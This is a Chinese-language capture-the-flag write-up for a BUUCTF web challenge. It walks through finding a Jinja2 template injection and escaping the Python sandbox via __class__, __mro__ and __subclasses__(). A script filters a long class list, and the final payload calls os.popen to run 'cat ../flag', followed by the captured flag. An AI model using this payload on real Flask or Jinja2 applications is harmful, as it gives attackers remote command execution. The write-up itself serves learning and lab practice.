buuctf-[BJDCTF 2nd]fake google简单拿下flag
这道题,
如果你知道一些沙盒机制,其实也完全没有技术含量,没有过滤任何东西,简单记录下吧
首先是这样一个界面,搜索框,其它也看不出来什么端倪,
我们随便输入点东西搜索1
源码里发现了线索,是ssti,那我们就简单就行测试,发现payload?name={{4*5}}
结果,被当作表达式执行了,返回20
于是我们就利用
__class__ :去获取当前类
__mro__:去获取基类 或者用__base__去获取也可
__subclasses__():去获取所有的子类
然后就利用哪些可以利用的类去getshell就可以了
本人是个菜鸡啊,就是现将所有的子类查出来,然后经过下面代码进行遍历,然后得到可以利用的类
str1 = ["<class 'type'>"," <class 'weakref'>"," <class 'weakcallableproxy'>"," <class 'weakproxy'>"," <class 'int'>"," <class 'bytearray'>"," <class 'bytes'>"," <class 'list'>"," <class 'NoneType'>"," <class 'NotImplementedType'>"," <class 'traceback'>"," <class 'super'>"," <class 'range'>"," <class 'dict'>"," <class 'dict_keys'>"," <class 'dict_values'>"," <class 'dict_items'>"," <class 'odict_iterator'>"," <class 'set'>"," <class 'str'>"," <class 'slice'>"," <class 'staticmethod'>"," <class 'complex'>"," <class 'float'>"," <class 'frozenset'>"," <class 'property'>"," <class 'managedbuffer'>"," <class 'memoryview'>"," <class 'tuple'>"," <class 'enumerate'>"," <class 'reversed'>"," <class 'stderrprinter'>"," <class 'code'>"," <class 'frame'>"," <class 'builtin_function_or_method'>"," <class 'method'>"," <class 'function'>"," <class 'mappingproxy'>"," <class 'generator'>"," <class 'getset_descriptor'>"," <class 'wrapper_descriptor'>"," <class 'method-wrapper'>"," <class 'ellipsis'>"," <class 'member_descriptor'>"," <class 'types.SimpleNamespace'>"," <class 'PyCapsule'>"," <class 'longrange_iterator'>"," <class 'cell'>"," <class 'instancemethod'>"," <class 'classmethod_descriptor'>"," <class 'method_descriptor'>"," <class 'callable_iterator'>"," <class 'iterator'>"," <class 'coroutine'>"," <class 'coroutine_wrapper'>"," <class 'EncodingMap'>"," <class 'fieldnameiterator'>"," <class 'formatteriterator'>"," <class 'filter'>"," <class 'map'>"," <class 'zip'>"," <class 'moduledef'>"," <class 'module'>"," <class 'BaseException'>"," <class '_frozen_importlib._ModuleLock'>"," <class '_frozen_importlib._DummyModuleLock'>"," <class '_frozen_importlib._ModuleLockManager'>"," <class '_frozen_importlib._installed_safely'>"," <class '_frozen_importlib.ModuleSpec'>"," <class '_frozen_importlib.BuiltinImporter'>"," <class 'classmethod'>"," <class '_frozen_importlib.FrozenImporter'>"," <class '_frozen_importlib._ImportLockContext'>"," <class '_thread._localdummy'>"," <class '_thread._local'>"," <class '_thread.lock'>"," <class '_thread.RLock'>"," <class '_frozen_importlib_external.WindowsRegistryFinder'>"," <class '_frozen_importlib_external._LoaderBasics'>"," <class '_frozen_importlib_external.FileLoader'>"," <class '_frozen_importlib_external._NamespacePath'>"," <class '_frozen_importlib_external._NamespaceLoader'>"," <class '_frozen_importlib_external.PathFinder'>"," <class '_frozen_importlib_external.FileFinder'>"," <class '_io._IOBase'>"," <class '_io._BytesIOBuffer'>"," <class '_io.IncrementalNewlineDecoder'>"," <class 'posix.ScandirIterator'>"," <class 'posix.DirEntry'>"," <class 'zipimport.zipimporter'>"," <class 'codecs.Codec'>"," <class 'codecs.IncrementalEncoder'>"," <class 'codecs.IncrementalDecoder'>"," <class 'codecs.StreamReaderWriter'>"," <class 'codecs.StreamRecoder'>"," <class '_weakrefset._IterationGuard'>"," <class '_weakrefset.WeakSet'>"," <class 'abc.ABC'>"," <class 'collections.abc.Hashable'>"," <class 'collections.abc.Awaitable'>"," <class 'collections.abc.AsyncIterable'>"," <class 'async_generator'>"," <class 'collections.abc.Iterable'>"," <class 'bytes_iterator'>"," <class 'bytearray_iterator'>"," <class 'dict_keyiterator'>"," <class 'dict_valueiterator'>"," <class 'dict_itemiterator'>"," <class 'list_iterator'>"," <class 'list_reverseiterator'>"," <class 'range_iterator'>"," <class 'set_iterator'>"," <class 'str_iterator'>"," <class 'tuple_iterator'>"," <class 'collections.abc.Sized'>"," <class 'collections.abc.Container'>"," <class 'collections.abc.Callable'>"," <class 'os._wrap_close'>"," <class '_sitebuiltins.Quitter'>"," <class '_sitebuiltins._Printer'>"," <class '_sitebuiltins._Helper'>"," <class 'types.DynamicClassAttribute'>"," <class 'functools.partial'>"," <class 'functools._lru_cache_wrapper'>"," <class 'operator.itemgetter'>"," <class 'operator.attrgetter'>"," <class 'operator.methodcaller'>"," <class 'itertools.accumulate'>"," <class 'itertools.combinations'>"," <class 'itertools.combinations_with_replacement'>"," <class 'itertools.cycle'>"," <class 'itertools.dropwhile'>"," <class 'itertools.takewhile'>"," <class 'itertools.islice'>"," <class 'itertools.starmap'>"," <class 'itertools.chain'>"," <class 'itertools.compress'>"," <class 'itertools.filterfalse'>"," <class 'itertools.count'>"," <class 'itertools.zip_longest'>"," <class 'itertools.permutations'>"," <class 'itertools.product'>"," <class 'itertools.repeat'>"," <class 'itertools.groupby'>"," <class 'itertools._grouper'>"," <class 'itertools._tee'>"," <class 'itertools._tee_dataobject'>"," <class 'reprlib.Repr'>"," <class 'collections.deque'>"," <class '_collections._deque_iterator'>"," <class '_collections._deque_reverse_iterator'>"," <class 'collections._Link'>"," <class 'weakref.finalize._Info'>"," <class 'weakref.finalize'>"," <class 'functools.partialmethod'>"," <class 'types._GeneratorWrapper'>"," <class 'enum.auto'>"," <enum 'Enum'>"," <class '_sre.SRE_Pattern'>"," <class '_sre.SRE_Match'>"," <class '_sre.SRE_Scanner'>"," <class 'sre_parse.Pattern'>"," <class 'sre_parse.SubPattern'>"," <class 'sre_parse.Tokenizer'>"," <class 're.Scanner'>"," <class 'string.Template'>"," <class 'string.Formatter'>"," <class 'markupsafe._MarkupEscapeHelper'>"," <class 'warnings.WarningMessage'>"," <class 'warnings.catch_warnings'>"," <class 'zlib.Compress'>"," <class 'zlib.Decompress'>"," <class 'tokenize.Untokenizer'>"," <class 'traceback.FrameSummary'>"," <class 'traceback.TracebackException'>"," <class 'threading._RLock'>"," <class 'threading.Condition'>"," <class 'threading.Semaphore'>"," <class 'threading.Event'>"," <class 'threading.Barrier'>"," <class 'threading.Thread'>"," <class '_bz2.BZ2Compressor'>"," <class '_bz2.BZ2Decompressor'>"," <class '_lzma.LZMACompressor'>"," <class '_lzma.LZMADecompressor'>"," <class '_hashlib.HASH'>"," <class '_blake2.blake2b'>"," <class '_blake2.blake2s'>"," <class '_sha3.sha3_224'>"," <class '_sha3.sha3_256'>"," <class '_sha3.sha3_384'>"," <class '_sha3.sha3_512'>"," <class '_sha3.shake_128'>"," <class '_sha3.shake_256'>"," <class '_random.Random'>"," <class 'tempfile._RandomNameSequence'>"," <class 'tempfile._TemporaryFileCloser'>"," <class 'tempfile._TemporaryFileWrapper'>"," <class 'tempfile.SpooledTemporaryFile'>"," <class 'tempfile.TemporaryDirectory'>"," <class 'Struct'>"," <class 'pickle._Framer'>"," <class 'pickle._Unframer'>"," <class 'pickle._Pickler'>"," <class 'pickle._Unpickler'>"," <class '_pickle.Unpickler'>"," <class '_pickle.Pickler'>"," <class '_pickle.Pdata'>"," <class '_pickle.PicklerMemoProxy'>"," <class '_pickle.UnpicklerMemoProxy'>"," <class 'urllib.parse._ResultMixinStr'>"," <class 'urllib.parse._ResultMixinBytes'>"," <class 'urllib.parse._NetlocResultMixinBase'>"," <class '_json.Scanner'>"," <class '_json.Encoder'>"," <class 'json.decoder.JSONDecoder'>"," <class 'json.encoder.JSONEncoder'>"," <class 'jinja2.utils.MissingType'>"," <class 'jinja2.utils.LRUCache'>"," <class 'jinja2.utils.Cycler'>"," <class 'jinja2.utils.Joiner'>"," <class 'jinja2.utils.Namespace'>"," <class 'jinja2.bccache.Bucket'>"," <class 'jinja2.bccache.BytecodeCache'>"," <class 'jinja2.nodes.EvalContext'>"," <class 'jinja2.nodes.Node'>"," <class 'jinja2.visitor.NodeVisitor'>"," <class 'jinja2.idtracking.Symbols'>"," <class '__future__._Feature'>"," <class 'jinja2.compiler.MacroRef'>"," <class 'jinja2.compiler.Frame'>"," <class 'jinja2.runtime.TemplateReference'>"," <class 'jinja2.runtime.Context'>"," <class 'jinja2.runtime.BlockReference'>"," <class 'jinja2.runtime.LoopContext'>"," <class 'jinja2.runtime.Macro'>"," <class 'jinja2.runtime.Undefined'>"," <class 'decimal.Decimal'>"," <class 'decimal.Context'>"," <class 'decimal.SignalDictMixin'>"," <class 'decimal.ContextManager'>"," <class 'numbers.Number'>"," <class '_ast.AST'>"," <class 'ast.NodeVisitor'>"," <class 'jinja2.lexer.Failure'>"," <class 'jinja2.lexer.TokenStreamIterator'>"," <class 'jinja2.lexer.TokenStream'>"," <class 'jinja2.lexer.Lexer'>"," <class 'jinja2.parser.Parser'>"," <class 'jinja2.environment.Environment'>"," <class 'jinja2.environment.Template'>"," <class 'jinja2.environment.TemplateModule'>"," <class 'jinja2.environment.TemplateExpression'>"," <class 'jinja2.environment.TemplateStream'>"," <class 'importlib.abc.Finder'>"," <class 'importlib.abc.Loader'>"," <class 'contextlib.ContextDecorator'>"," <class 'pkgutil.ImpImporter'>"," <class 'pkgutil.ImpLoader'>"," <class 'jinja2.loaders.BaseLoader'>"," <class 'select.poll'>"," <class 'select.epoll'>"," <class 'selectors.BaseSelector'>"," <class '_socket.socket'>"," <class 'datetime.date'>"," <class 'datetime.timedelta'>"," <class 'datetime.time'>"," <class 'datetime.tzinfo'>"," <class 'dis.Bytecode'>"," <class 'inspect.BlockFinder'>"," <class 'inspect._void'>"," <class 'inspect._empty'>"," <class 'inspect.Parameter'>"," <class 'inspect.BoundArguments'>"," <class 'inspect.Signature'>"," <class 'logging.LogRecord'>"," <class 'logging.PercentStyle'>"," <class 'logging.Formatter'>"," <class 'logging.BufferingFormatter'>"," <class 'logging.Filter'>"," <class 'logging.Filterer'>"," <class 'logging.PlaceHolder'>"," <class 'logging.Manager'>"," <class 'logging.LoggerAdapter'>"," <class 'werkzeug._internal._Missing'>"," <class 'werkzeug._internal._DictAccessorProperty'>"," <class 'werkzeug.utils.HTMLBuilder'>"," <class 'werkzeug.exceptions.Aborter'>"," <class 'werkzeug.urls.Href'>"," <class 'socketserver.BaseServer'>"," <class 'socketserver.ForkingMixIn'>"," <class 'socketserver.ThreadingMixIn'>"," <class 'socketserver.BaseRequestHandler'>"," <class 'calendar._localized_month'>"," <class 'calendar._localized_day'>"," <class 'calendar.Calendar'>"," <class 'calendar.different_locale'>"," <class 'email._parseaddr.AddrlistClass'>"," <class 'email.charset.Charset'>"," <class 'email.header.Header'>"," <class 'email.header._ValueFormatter'>"," <class 'email._policybase._PolicyBase'>"," <class 'email.feedparser.BufferedSubFile'>"," <class 'email.feedparser.FeedParser'>"," <class 'email.parser.Parser'>"," <class 'email.parser.BytesParser'>"," <class 'email.message.Message'>"," <class 'http.client.HTTPConnection'>"," <class 'ipaddress._IPAddressBase'>"," <class 'ipaddress._BaseV4'>"," <class 'ipaddress._IPv4Constants'>"," <class 'ipaddress._BaseV6'>"," <class 'ipaddress._IPv6Constants'>"," <class 'textwrap.TextWrapper'>"," <class '_ssl._SSLContext'>"," <class '_ssl._SSLSocket'>"," <class '_ssl.MemoryBIO'>"," <class '_ssl.Session'>"," <class 'ssl.SSLObject'>"," <class 'mimetypes.MimeTypes'>"," <class 'gettext.NullTranslations'>"," <class 'argparse._AttributeHolder'>"," <class 'argparse.HelpFormatter._Section'>"," <class 'argparse.HelpFormatter'>"," <class 'argparse.FileType'>"," <class 'argparse._ActionsContainer'>"," <class 'click._compat._FixupStream'>"," <class 'shlex.shlex'>"," <class 'click._compat._AtomicFile'>"," <class 'click.utils.LazyFile'>"," <class 'click.utils.KeepOpenFile'>"," <class 'click.utils.PacifyFlushWrapper'>"," <class 'click.parser.Option'>"," <class 'click.parser.Argument'>"," <class 'click.parser.ParsingState'>"," <class 'click.parser.OptionParser'>"," <class 'click.types.ParamType'>"," <class 'click.formatting.HelpFormatter'>"," <class 'click.core.Context'>"," <class 'click.core.BaseCommand'>"," <class 'click.core.Parameter'>"," <class 'werkzeug.serving.WSGIRequestHandler'>"," <class 'werkzeug.serving._SSLContext'>"," <class 'werkzeug.serving.BaseWSGIServer'>"," <class 'werkzeug.datastructures.ImmutableListMixin'>"," <class 'werkzeug.datastructures.ImmutableDictMixin'>"," <class 'werkzeug.datastructures.UpdateDictMixin'>"," <class 'werkzeug.datastructures.ViewItems'>"," <class 'werkzeug.datastructures._omd_bucket'>"," <class 'werkzeug.datastructures.Headers'>"," <class 'werkzeug.datastructures.ImmutableHeadersMixin'>"," <class 'werkzeug.datastructures.IfRange'>"," <class 'werkzeug.datastructures.Range'>"," <class 'werkzeug.datastructures.ContentRange'>"," <class 'werkzeug.datastructures.FileStorage'>"," <class 'urllib.request.Request'>"," <class 'urllib.request.OpenerDirector'>"," <class 'urllib.request.BaseHandler'>"," <class 'urllib.request.HTTPPasswordMgr'>"," <class 'urllib.request.AbstractBasicAuthHandler'>"," <class 'urllib.request.AbstractDigestAuthHandler'>"," <class 'urllib.request.URLopener'>"," <class 'urllib.request.ftpwrapper'>"," <class 'werkzeug.wrappers.accept.AcceptMixin'>"," <class 'werkzeug.wrappers.auth.AuthorizationMixin'>"," <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>"," <class 'werkzeug.wsgi.ClosingIterator'>"," <class 'werkzeug.wsgi.FileWrapper'>"," <class 'werkzeug.wsgi._RangeWrapper'>"," <class 'werkzeug.formparser.FormDataParser'>"," <class 'werkzeug.formparser.MultiPartParser'>"," <class 'werkzeug.wrappers.base_request.BaseRequest'>"," <class 'werkzeug.wrappers.base_response.BaseResponse'>"," <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>"," <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>"," <class 'werkzeug.wrappers.etag.ETagRequestMixin'>"," <class 'werkzeug.wrappers.etag.ETagResponseMixin'>"," <class 'werkzeug.wrappers.cors.CORSRequestMixin'>"," <class 'werkzeug.wrappers.cors.CORSResponseMixin'>"," <class 'werkzeug.useragents.UserAgentParser'>"," <class 'werkzeug.useragents.UserAgent'>"," <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>"," <class 'werkzeug.wrappers.request.StreamOnlyMixin'>"," <class 'werkzeug.wrappers.response.ResponseStream'>"," <class 'werkzeug.wrappers.response.ResponseStreamMixin'>"," <class 'http.cookiejar.Cookie'>"," <class 'http.cookiejar.CookiePolicy'>"," <class 'http.cookiejar.Absent'>"," <class 'http.cookiejar.CookieJar'>"," <class 'werkzeug.test._TestCookieHeaders'>"," <class 'werkzeug.test._TestCookieResponse'>"," <class 'werkzeug.test.EnvironBuilder'>"," <class 'werkzeug.test.Client'>"," <class 'uuid.UUID'>"," <class 'CArgObject'>"," <class '_ctypes.CThunkObject'>"," <class '_ctypes._CData'>"," <class '_ctypes.CField'>"," <class '_ctypes.DictRemover'>"," <class 'ctypes.CDLL'>"," <class 'ctypes.LibraryLoader'>"," <class 'subprocess.CompletedProcess'>"," <class 'subprocess.Popen'>"," <class 'itsdangerous._json._CompactJSON'>"," <class 'hmac.HMAC'>"," <class 'itsdangerous.signer.SigningAlgorithm'>"," <class 'itsdangerous.signer.Signer'>"," <class 'itsdangerous.serializer.Serializer'>"," <class 'itsdangerous.url_safe.URLSafeSerializerMixin'>"," <class 'flask._compat._DeprecatedBool'>"," <class 'werkzeug.local.Local'>"," <class 'werkzeug.local.LocalStack'>"," <class 'werkzeug.local.LocalManager'>"," <class 'werkzeug.local.LocalProxy'>"," <class 'difflib.SequenceMatcher'>"," <class 'difflib.Differ'>"," <class 'difflib.HtmlDiff'>"," <class 'pprint._safe_key'>"," <class 'pprint.PrettyPrinter'>"," <class 'werkzeug.routing.RuleFactory'>"," <class 'werkzeug.routing.RuleTemplate'>"," <class 'werkzeug.routing.BaseConverter'>"," <class 'werkzeug.routing.Map'>"," <class 'werkzeug.routing.MapAdapter'>"," <class 'flask.signals.Namespace'>"," <class 'flask.signals._FakeSignal'>"," <class 'flask.helpers.locked_cached_property'>"," <class 'flask.helpers._PackageBoundObject'>"," <class 'flask.cli.DispatchingApp'>"," <class 'flask.cli.ScriptInfo'>"," <class 'flask.config.ConfigAttribute'>"," <class 'flask.ctx._AppCtxGlobals'>"," <class 'flask.ctx.AppContext'>"," <class 'flask.ctx.RequestContext'>"," <class 'flask.json.tag.JSONTag'>"," <class 'flask.json.tag.TaggedJSONSerializer'>"," <class 'flask.sessions.SessionInterface'>"," <class 'werkzeug.wrappers.json._JSONModule'>"," <class 'werkzeug.wrappers.json.JSONMixin'>"," <class 'flask.blueprints.BlueprintSetupState'>"," <class 'unicodedata.UCD'>"," <class 'jinja2.ext.Extension'>"," <class 'jinja2.ext._CommentFinder'>"] search = "os" count=0 for i in str1: if search in i: print("{}--->{}".format(count,i)) count+=1
然后根据打印结果:
87---> <class 'posix.ScandirIterator'> 88---> <class 'posix.DirEntry'> 117---> <class 'os._wrap_close'> 196---> <class 'tempfile._TemporaryFileCloser'> 366---> <class 'werkzeug.wsgi.ClosingIterator'>
这里我用了117这个类,构造payload如下
?name={{"".__class__.__mro__[1].__subclasses__()[117].__init__.__globals__['popen']('cat ../flag').read()}}
然后我们拿到flag
flag{1df1bd4b-728e-4d08-822d-6121caaf1ae6}
这道题,就是顺着类网上找,沙盒逃逸,然后获得shell 去查找flag
